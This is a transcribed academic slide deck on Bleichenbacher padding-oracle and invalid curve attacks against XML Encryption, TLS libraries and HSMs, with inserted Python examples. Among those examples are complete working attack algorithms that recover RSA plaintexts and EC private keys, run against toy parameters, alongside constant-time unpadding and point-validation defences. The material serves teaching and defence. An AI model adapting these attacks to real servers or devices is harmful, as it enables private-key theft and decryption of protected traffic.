Practical Attacks on Real World Crypto Implementations - Juraj Somorovsky, Ruhr University Bochum (PowerPoint PPT Presentation)


SLIDE 1

Practical Attacks on Real World Crypto Implementations

Juraj Somorovsky

Ruhr University Bochum, HGI / 3curity, @jurajsomorovsky

SLIDE 2

Recent years revealed many crypto attacks…

  • ESORICS 2004, Bard: The Vulnerability of SSL to Chosen Plaintext Attack
  • Eurocrypt 2002, Vaudenay: Security Flaws Induced by CBC Padding: Applications to SSL, IPSEC, WTLS
  • Crypto 1998, Bleichenbacher: Chosen Ciphertext Attacks Against Protocols Based on the RSA Encryption Standard PKCS #1

SLIDE 3

Standards updated

  • Countermeasures defined
  • What could go wrong in RWC (real-world crypto) implementations?

SLIDE 4

Overview

  • 1. Bleichenbacher’s Attack
    – XML Encryption
    – TLS
  • 2. Invalid Curve Attack
    – TLS
    – Hardware Security Modules

SLIDE 5

RSA-PKCS#1 v1.5

  • Used to encrypt symmetric keys
  • Vulnerable to an adaptive chosen-ciphertext attack (Bleichenbacher, 1998)

[Diagram: a client sends the XML Encryption ciphertext C = Enc(M) to the server, which computes M = Dec(C). The attacker then submits modified ciphertexts C1, C2, … derived from C and learns from each response only whether the PKCS#1 padding was valid or invalid; repeated many times, these yes/no answers are enough to recover M.]
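The oracle exchange on this slide, carried through as an added worked example (not code from the talk): a PKCS#1 v1.5 padding oracle over a constructed toy RSA key, and Bleichenbacher's interval-narrowing algorithm driven only by that oracle's valid/invalid answers. The key (built from two Mersenne primes), the sample message and the loose oracle that checks only the leading 00 02 bytes are assumptions of the example; a stricter oracle changes the number of queries, not the algorithm.

```python
"""Bleichenbacher's adaptive chosen-ciphertext attack on RSA PKCS#1 v1.5,
driven by a padding oracle. Toy key (two Mersenne primes, ~234 bits) so a
run takes seconds; never use such a key for anything real."""
import os

P_PRIME, Q_PRIME = (1 << 107) - 1, (1 << 127) - 1   # constructed toy primes
N = P_PRIME * Q_PRIME
E = 65537
D = pow(E, -1, (P_PRIME - 1) * (Q_PRIME - 1))
K = (N.bit_length() + 7) // 8                        # modulus size in bytes (30)


def pkcs1_v15_pad(msg, k=K):
    """EM = 00 02 || PS (random non-zero bytes, at least 8) || 00 || msg"""
    if len(msg) > k - 11:
        raise ValueError("message too long")
    ps = b""
    while len(ps) < k - 3 - len(msg):
        ps += os.urandom(1).replace(b"\x00", b"")
    return b"\x00\x02" + ps + b"\x00" + msg


def rsa_encrypt(em):
    return pow(int.from_bytes(em, "big"), E, N)


def padding_oracle(c):
    """The leak: does c^d mod n start with 00 02? Whether a server reveals this
    through an error message, a timing difference or later behaviour is irrelevant."""
    em = pow(c, D, N).to_bytes(K, "big")
    return em[0] == 0x00 and em[1] == 0x02


def ceil_div(a, b):
    return -(-a // b)


def merge(intervals):
    intervals.sort()
    out = []
    for lo, hi in intervals:
        if out and lo <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], hi))
        else:
            out.append((lo, hi))
    return out


def bleichenbacher(c, oracle):
    """Recover m = c^d mod n using only oracle answers. Returns (m, #queries)."""
    B = 1 << (8 * (K - 2))
    B2, B3 = 2 * B, 3 * B
    queries = 0

    def conforming(s):
        nonlocal queries
        queries += 1
        return oracle(c * pow(s, E, N) % N)   # decrypts to s*m mod n

    M = [(B2, B3 - 1)]                         # c itself conforms, so s0 = 1
    s = ceil_div(N, B3)                        # step 2a: first s >= n/3B
    while not conforming(s):
        s += 1
    while True:
        new_M = []                             # step 3: narrow every interval
        for a, b in M:
            for r in range(ceil_div(a * s - B3 + 1, N), (b * s - B2) // N + 1):
                lo = max(a, ceil_div(B2 + r * N, s))
                hi = min(b, (B3 - 1 + r * N) // s)
                if lo <= hi:
                    new_M.append((lo, hi))
        M = merge(new_M)
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0], queries            # step 4: m = a * s0^-1 = a
        if len(M) > 1:                         # step 2b: several intervals, search linearly
            s += 1
            while not conforming(s):
                s += 1
        else:                                  # step 2c: one interval, jump ahead with r
            a, b = M[0]
            r = ceil_div(2 * (b * s - B2), N)
            s = None
            while s is None:
                lo, hi = ceil_div(B2 + r * N, b), (B3 - 1 + r * N) // a
                s = next((cand for cand in range(lo, hi + 1) if conforming(cand)), None)
                r += 1


def demo(secret=b"premaster-secret"):
    """Pad and encrypt `secret`, then recover it from the oracle alone."""
    m, queries = bleichenbacher(rsa_encrypt(pkcs1_v15_pad(secret)), padding_oracle)
    em = m.to_bytes(K, "big")
    return em[em.index(b"\x00", 2) + 1:], queries
```

demo() returns the recovered plaintext together with the number of oracle queries; even for this small key a run needs on the order of thousands of queries, which is why each case in the following slides turns on how cheaply one query can be answered.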

SLIDE 6

RSA-PKCS#1 v1.5: Countermeasures

  • 1. Use RSA-OAEP (PKCS#1 v2)
  • 2. Apply the specific countermeasure: never signal a padding failure

    generate random r                  (before decrypting)
    decrypt ciphertext: m = dec(c)
    if (padding correct)
        proceed with m
    else
        proceed with r                 (same length as m, same code path afterwards)

SLIDE 7

Overview (outline as on slide 4)

SLIDE 8

RSA PKCS#1 v1.5 in XML Encryption

  • Hybrid encryption:

    k = Dec_pkcs(priv, C1)
    m = Dec_aes128(k, C2)

[Diagram: C1 → Dec_pkcs → k; C2 → Dec_aes128 → m]

SLIDE 9

Attack Countermeasure

  • Hybrid encryption with a random fallback key:

    k = Dec_pkcs(priv, C1)
    m = Dec_aes128(k, C2)

    Random: 128 b (bits), i.e. a random AES-128 key takes the place of k when PKCS#1 unpadding fails

SLIDE 10

Case Apache WSS4J

  • Hybrid encryption with a random fallback key:

    k = Dec_pkcs(priv, C1)
    m = Dec_aes128(k, C2)

    Random: 128 B (bytes, not bits): the fallback key has the wrong length for AES-128, so the failure case stays distinguishable

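The length mismatch contrasted on the WSS4J slides above, as an added example (not WSS4J's code): the hybrid decryption k = Dec_pkcs(priv, C1); m = Dec_aes128(k, C2) with the countermeasure from slide 6, where the only thing that varies is the length of the random fallback key. AES-128 is replaced by a constructed stand-in stream cipher that keeps the two library behaviours that matter here (it rejects key sizes other than 16/24/32 bytes before touching the data, and it reports a padding error for a wrong key), and Dec_pkcs is represented by its result. The sample payload and the modelling of a PKCS#1-valid but wrong result as a random 16-byte key are assumptions of the example.

```python
"""Why the fallback key must have the expected length. Models
    k = Dec_pkcs(priv, C1);  m = Dec_aes128(k, C2)
with the slide 6 countermeasure (replace an invalid k by a random key and go
on). The stand-in for AES-128-CBC below is a SHA-256 keystream plus PKCS#7
padding, constructed for this example only; it is not a cipher to reuse."""
import hashlib
import os

AES_KEY_SIZES = (16, 24, 32)
BLOCK = 16


def _keystream_xor(key, iv, data):
    out = bytearray()
    for i in range(0, len(data), BLOCK):
        ks = hashlib.sha256(key + iv + i.to_bytes(4, "big")).digest()[:BLOCK]
        out += bytes(x ^ y for x, y in zip(data[i:i + BLOCK], ks))
    return bytes(out)


def toy_encrypt(key, iv, msg):
    pad = BLOCK - len(msg) % BLOCK
    return _keystream_xor(key, iv, msg + bytes([pad]) * pad)


def toy_decrypt(key, iv, ct):
    """Behaves like a library AES call in the two ways that matter here."""
    if len(key) not in AES_KEY_SIZES:
        raise ValueError("invalid key size")      # raised before any decryption
    pt = _keystream_xor(key, iv, ct)
    pad = pt[-1] if pt else 0
    if not 1 <= pad <= BLOCK or pt[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding")           # the usual failure for a wrong key
    return pt[:-pad]


def hybrid_decrypt(k_from_rsa, iv, c2, fallback_len):
    """k_from_rsa is the PKCS#1 v1.5 unpadding result, or None if the padding
    was invalid. fallback_len is 16 (128 bits) in the correct countermeasure and
    128 (bytes) in the WSS4J case shown on the slides."""
    if k_from_rsa is None:
        k_from_rsa = os.urandom(fallback_len)
    return toy_decrypt(k_from_rsa, iv, c2)


def error_classes(pkcs_valid, fallback_len, trials=16):
    """Set of outcomes a network attacker can observe for tampered C1 values.
    A PKCS#1-valid result with a wrong key is modelled as a random 16-byte key
    (the real length would vary, which is part of why the actual bug was messier)."""
    iv = bytes(BLOCK)
    c2 = toy_encrypt(os.urandom(16), iv, b"<xenc:EncryptedData/>")   # constructed sample
    seen = set()
    for _ in range(trials):
        try:
            hybrid_decrypt(os.urandom(16) if pkcs_valid else None, iv, c2, fallback_len)
            seen.add("ok")
        except ValueError as err:
            seen.add(str(err))
    return seen
```

With a 128-byte fallback the invalid-padding case always surfaces as "invalid key size", an error the valid-padding case can never produce, so the oracle survives the countermeasure; with a 16-byte fallback both cases fall through to the same padding check and the attacker sees the same error classes.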

SLIDE 12

Case Apache WSS4J

  • Original bug much more complicated
  • CVE-2015-0226
  • Dennis Kupser, Christian Mainka, Jörg Schwenk, Juraj Somorovsky: How to Break XML Encryption – Automatically (WOOT ’15)
  • Found automatically using WS-Attacker
  • https://github.com/RUB-NDS/WS-Attacker

SLIDE 13

Overview (outline as on slide 4)

SLIDE 14

How About TLS?

  • Christopher Meyer, Juraj Somorovsky, Jörg Schwenk, Eugen Weiss, Sebastian Schinzel, Erik Tews: Revisiting SSL/TLS Implementations: New Bleichenbacher Side Channels and Attacks. USENIX Security 2014
  • Practical attacks on JSSE, Bouncy Castle, Cavium Accelerator
  • Bug in OpenSSL

SLIDE 15

Case JSSE

  • No direct TLS error messages
  • Uses PKCS#1 unpadding function (schematic; the check body is filled in, the shape is the slide's):

    import java.util.Arrays;
    import javax.crypto.BadPaddingException;

    private byte[] unpadV15(byte[] padded) throws BadPaddingException {
        // Expected layout: 0x00 0x02 | at least 8 non-zero bytes | 0x00 | message
        int sep = 2;
        while (sep < padded.length && padded[sep] != 0x00) {
            sep++;
        }
        if (padded.length > 10 && padded[0] == 0x00 && padded[1] == 0x02
                && sep >= 10 && sep < padded.length) {
            return Arrays.copyOfRange(padded, sep + 1, padded.length);   // PKCS valid
        }
        throw new BadPaddingException();   // PKCS invalid: caught by the caller,
    }                                      // which then substitutes a random secret

  • Caught, random generated… what’s wrong?

SLIDE 16

Case JSSE (CVE-2014-0411)

  • Exception consumes about 20 microseconds!

[Timing plot: PKCS#1 valid, no exception vs. PKCS#1 invalid, exception]

Bleichenbacher’s Attack over LAN!
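The fix this slide calls for, as an added example (not JSSE's or OpenSSL's code): PKCS#1 v1.5 unpadding for a TLS premaster secret written so that the valid and invalid cases execute the same operations and neither path throws, with the fallback drawn before the block is inspected, as slide 6 prescribes. The 48-byte secret length, the 64-byte sample block and the branch-free helpers are assumptions of the example.

```python
"""Branch-free RSA PKCS#1 v1.5 unpadding with a random fallback, the
countermeasure TLS 1.2 (RFC 5246, 7.4.7.1) asks for. Python gives no timing
guarantees; what carries over to C or Java is the shape: no exception and no
data-dependent branch between reading the block and producing the secret."""
import os

PREMASTER_LEN = 48          # TLS premaster secret length is public and fixed


def ct_is_zero(x):
    """1 if x == 0 else 0 for 0 <= x < 256, computed without a branch."""
    return 1 ^ (((x | -x) >> 8) & 1)


def ct_eq(a, b):
    return ct_is_zero(a ^ b)


def ct_select(choose_a, a, b):
    """choose_a in {0, 1}: returns a for 1, b for 0 (byte values, no branch)."""
    mask = -choose_a            # 0 -> 0, 1 -> all bits set
    return (a & mask) | (b & ~mask)


def rsa_unpad_premaster(em, fallback=None):
    """em: the raw RSA output (k bytes), expected as
         00 02 | k - 51 non-zero bytes | 00 | 48-byte premaster secret
    Returns the premaster if the layout holds, otherwise `fallback`, which is
    random unless the caller supplied one. Same work on every input."""
    k = len(em)
    if k < PREMASTER_LEN + 11:                  # modulus size is public: may branch
        raise ValueError("modulus too short for PKCS#1 v1.5 with a 48-byte secret")
    if fallback is None:
        fallback = os.urandom(PREMASTER_LEN)    # drawn before the block is inspected
    sep = k - PREMASTER_LEN - 1                 # separator sits at a fixed position
    good = ct_eq(em[0], 0x00) & ct_eq(em[1], 0x02) & ct_eq(em[sep], 0x00)
    for i in range(2, sep):                     # padding string must contain no 00
        good &= 1 ^ ct_is_zero(em[i])
    return bytes(ct_select(good, em[sep + 1 + i], fallback[i])
                 for i in range(PREMASTER_LEN))
```

Because the premaster length is known, the separator position is fixed and the loop bounds depend only on the public modulus size; the TLS version bytes inside the premaster are left to the caller, which should compare them the same way rather than branch on them.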

SLIDE 17

Overview (outline as on slide 4)

SLIDE 18

Elliptic Curve

  • Set of points over a finite field
  • Used e.g. for key exchange

[Diagram: the client sends a point P; the server, holding the secret s, computes the key s·P]

SLIDE 19

Invalid Curve Attack

  • Crypto 2000: Biehl, Meyer, Müller
  • Attacker sends an invalid point Q of small order (e.g. 5)
  • Attacker computes:

    s1 = s mod 5

[Diagram: the attacker sends the invalid point Q; the server with secret s computes s·Q, and since Q has order 5 the result depends only on s mod 5]

SLIDE 20

Invalid Curve Attack

  • Choose points of small co-prime order (5, 7, 11, 13, …)
  • Send to the server
  • Compute:

    s1 = s mod 5
    s2 = s mod 7
    s3 = s mod 11
    s4 = s mod 13

  • Compute s with CRT (Chinese Remainder Theorem) once the product of the orders exceeds the range of s
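The procedure on the last two slides, plus the "check that the point is on the curve" advice from the conclusions, carried through as an added example (not the paper's or any library's code) on a constructed toy curve over GF(1019): the server's scalar multiplication never uses the coefficient b, so points of prime order 5, 7, 11, 13, … taken from other curves with the same a leak s mod 5, s mod 7, … and CRT reassembles s. It goes on through the listed primes until their product exceeds the order of the base point, which generalises the four residues on the slide. The curve parameters, the seeded random points and the key derivation over both coordinates are assumptions; real TLS-ECDH derives the key from the x coordinate only, which leaves each residue known up to sign and costs the attacker extra guessing.

```python
"""Invalid curve attack on a toy curve, and the on-curve check that stops it.
Curve y^2 = x^3 + A x + B over GF(P) with constructed, non-standard parameters."""
import hashlib
import random

P = 1019     # field prime, P % 4 == 3 so square roots are one pow()
A = 2        # coefficient a: shared by the legitimate curve and every invalid one
B = 3        # coefficient b of the legitimate curve
INF = None   # point at infinity


def ec_add(p1, p2):
    """Affine addition and doubling. b never appears: an unvalidated point
    silently moves the whole computation to the curve y^2 = x^3 + A x + b'."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return INF
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Double-and-add with no validation of pt: the flawed server routine."""
    acc = INF
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def is_on_curve(pt):
    """The missing check: reject points that do not satisfy the agreed curve."""
    return pt is not INF and (pt[1] ** 2 - (pt[0] ** 3 + A * pt[0] + B)) % P == 0


def point_order(pt):
    n, q = 1, pt
    while q is not INF:
        q, n = ec_add(q, pt), n + 1
    return n


def kdf(pt):
    """Key the attacker observes; both coordinates hashed (see lead-in)."""
    data = b"inf" if pt is INF else pt[0].to_bytes(2, "big") + pt[1].to_bytes(2, "big")
    return hashlib.sha256(data).digest()


class Server:
    def __init__(self, secret, validate):
        self._s, self.validate = secret, validate

    def handshake(self, client_point):
        if self.validate and not is_on_curve(client_point):
            raise ValueError("point not on curve")
        return kdf(ec_mul(self._s, client_point))


def small_order_point(r, rng):
    """A point of prime order r on some curve with coefficient A (b' implied by the point)."""
    while True:
        pt = (rng.randrange(P), rng.randrange(1, P))
        n = point_order(pt)
        if n % r == 0:
            return ec_mul(n // r, pt)


def crt(residues, moduli):
    x, m = 0, 1
    for res, mod in zip(residues, moduli):
        x += m * ((res - x) * pow(m, -1, mod) % mod)
        m *= mod
    return x % m


def recover_secret(server, n_bound, rng, primes=(5, 7, 11, 13, 17, 19, 23)):
    """Each invalid point Q of order r leaks s mod r, because s*Q = (s mod r)*Q
    and r is small enough to try every j. CRT combines the residues."""
    residues, moduli, product = [], [], 1
    for r in primes:
        q = small_order_point(r, rng)
        observed = server.handshake(q)
        residues.append(next(j for j in range(r) if kdf(ec_mul(j, q)) == observed))
        moduli.append(r)
        product *= r
        if product > n_bound:
            return crt(residues, moduli)
    raise RuntimeError("more small-order points needed")


def base_point():
    """A point of large order on the legitimate curve."""
    for x in range(1, P):
        v = (x ** 3 + A * x + B) % P
        y = pow(v, (P + 1) // 4, P)
        if v and y * y % P == v and point_order((x, y)) > P // 4:
            return (x, y)


def demo(seed=7):
    rng = random.Random(seed)
    n = point_order(base_point())
    secret = rng.randrange(1, n)
    return secret, recover_secret(Server(secret, validate=False), n, rng)
```

demo() returns the server's secret and the value the attacker reconstructs from a handful of handshakes; constructing Server(secret, validate=True) makes handshake() raise on every invalid point, which is the one-line check the conclusions ask developers for.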

SLIDE 21

Overview (outline as on slide 4)

SLIDE 22

Practical Attacks?

  • Tibor Jager, Jörg Schwenk, Juraj Somorovsky: Practical Invalid Curve Attacks on TLS-ECDH. ESORICS 2015
  • Analyzed 8 libraries
  • 2 vulnerable
    – Bouncy Castle: 3300 TLS queries
    – Oracle JSSE: 17000 TLS queries

SLIDE 23

Impact

  • Attacks extract server private keys
  • Java servers using EC certificates vulnerable
    – For example Apache Tomcat

Demo

SLIDE 24

Overview (outline as on slide 4)

SLIDE 25

Attacker Model in HSM Scenarios

  • Storage of crypto keys
  • Keys never leave HSMs

[Diagram: the application sends dec(C) to the HSM, which holds the keys (RSA, EC, AES …) and returns only m]

SLIDE 26

Attacker Model in HSM Scenarios

  • Storage of crypto keys
  • Keys never leave HSMs

[Diagram: a getKey request to the HSM must not return the keys (RSA, EC, AES …); they stay inside]

SLIDE 27

How about Invalid Curve Attacks?

  • CVE-2015-6924 (with Dennis Felsch)
  • Utimaco HSMs vulnerable
  • < 100 queries to get a key… Heartbleed effect
  • Thanks to cooperation of Utimaco
    – Provided sample code, fast fix
  • Utimaco HSM is FIPS certified

"Catastrophic" is the right word. On the scale of 1 to 10, this is an 11.

SLIDE 28

Conclusions

  • Old attacks relevant for RWC implementations
  • Old algorithms in the newest standards
    – RSA PKCS#1 v1.5 (attack: 1998) still in TLS 1.2 (2008), XML Encryption 1.1 (2013), JSON Web Encryption (2015)
    – Positive example: TLS 1.3 (no RSA PKCS#1 v1.5 key transport)

SLIDE 29

Conclusions

  • For standard designers:
    – Remove old crypto
  • For developers:
    – Analyze possible side-channels, follow best practices
    – Check that the point is on the curve
  • For pentesters:
    – More tools / analyses of crypto applications needed